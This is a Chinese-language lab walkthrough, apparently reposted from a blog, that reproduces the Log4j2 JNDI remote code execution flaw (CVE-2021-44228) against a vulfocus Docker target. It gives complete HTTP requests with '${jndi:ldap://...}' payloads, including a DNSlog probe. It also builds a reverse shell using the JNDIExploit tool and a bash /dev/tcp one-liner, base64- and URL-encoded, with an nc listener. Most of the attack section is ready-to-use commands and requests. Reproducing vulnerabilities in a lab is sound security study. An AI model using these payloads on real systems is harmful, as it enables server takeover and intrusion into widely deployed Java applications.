漏洞簡介
Apache Log4j2是一款Java日志框架,大量應用于業務系統開發,2021年11月24日,阿里云安全團隊向Apache官方報告了Apache Log4j2遠程代碼執行漏洞(CVE-2021-44228),
Apache Log4j2遠程代碼執行漏洞由Lookup功能引發,Log4j2在默認情況下會開啟Lookup功能,用于將特殊值添加到日志中,此功能中也支持對JNDI的Lookup,但由于Lookup對于加載的JNDI內容未做任何限制,使得攻擊者可以通過JNDI注入實作遠程加載惡意類到應用中,從而造成RCE(遠程代碼執行),
影響版本
Apache Log4j 2.x < 2.15.0-rc2
環境搭建
docker pull vulfocus/log4j2-rce-2021-12-09 #拉取漏洞鏡像
![[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-wJ5jyPG0-1639919975004)(log4j_rce.assets/image-20211219064800396.png)]](https://img.uj5u.com/2021/12/20/289943200915524.png)
docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 #開啟環境
![[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-JwyHNW53-1639919975006)(log4j_rce.assets/image-20211219064939550.png)]](https://img.uj5u.com/2021/12/20/289943200915521.png)
漏洞復現
dnslog回顯
訪問:http://192.168.99.100:38080/hello
![[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-00TUYBWB-1639919975006)(log4j_rce.assets/image-20211219065150373.png)]](https://img.uj5u.com/2021/12/20/289943200915525.png)
使用 BurpSuite 抓包:
![[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-eu9z9JTW-1639919975007)(log4j_rce.assets/image-20211219065228161.png)]](https://img.uj5u.com/2021/12/20/289943200915526.png)
右鍵改變請求方法:
![[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-xCpsE8Fn-1639919975008)(log4j_rce.assets/image-20211219065333100.png)]](https://img.uj5u.com/2021/12/20/289943200915527.png)
請求包變為:
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Payload:${jndi:ldap://xxx.dnslog.cn/exp}
本次使用為:${jndi:ldap://29l3ni.dnslog.cn/exp}
加到請求包中:
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
payload=${jndi:ldap://29l3ni.dnslog.cn/exp}
點擊send,查看 dnslog 回顯:
![[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-d2iMoPSL-1639919975009)(log4j_rce.assets/image-20211219065714279.png)]](https://img.uj5u.com/2021/12/20/289943200915528.png)
成功回顯,說明存在漏洞,
反彈shell
使用工具:https://github.com/zzwlpx/JNDIExploit.git
kali下載:
git clone https://github.com/zzwlpx/JNDIExploit.git
執行命令,開啟服務:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.99.121 #攻擊機ip
反彈shell命令:
bash -i >& /dev/tcp/192.169.99.121/4444 0>&1
初始請求包:
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
payload格式 :${jndi:ldap://192.168.99.121:1389/TomcatBypass/Command/Base64/[反彈shell命令的變形]}
變形1:base64編碼:
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA+JjE=
變形2:url編碼:(注:這里url編碼要選擇URL-encode key characters)
YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%2bJjE%3d
![[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-4Kq7Io4e-1639919975010)(log4j_rce.assets/image-20211219074518448.png)]](https://img.uj5u.com/2021/12/20/289943200915529.png)
變形3:再進行一次url編碼:(注:這里url編碼要選擇URL-encode key characters)
YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%252bJjE%253d
將payload加到請求包中變為:
POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
payload=${jndi:ldap://192.168.99.121:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%252bJjE%253d}
開啟監聽
nc -lvvp 4444
![[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-DbZbIH1L-1639919975011)(log4j_rce.assets/image-20211219075614304.png)]](https://img.uj5u.com/2021/12/20/289943200915522.png)
點擊send
![[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-UISH4KTr-1639919975011)(log4j_rce.assets/image-20211219080157313.png)]](https://img.uj5u.com/2021/12/20/289943200915523.png)
成功反彈shell!
僅供學習!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/386789.html
標籤:其他
上一篇:mac電腦安裝AWVS14最新版本支持log4j檢測
下一篇:Log4J2 靶場漏洞復現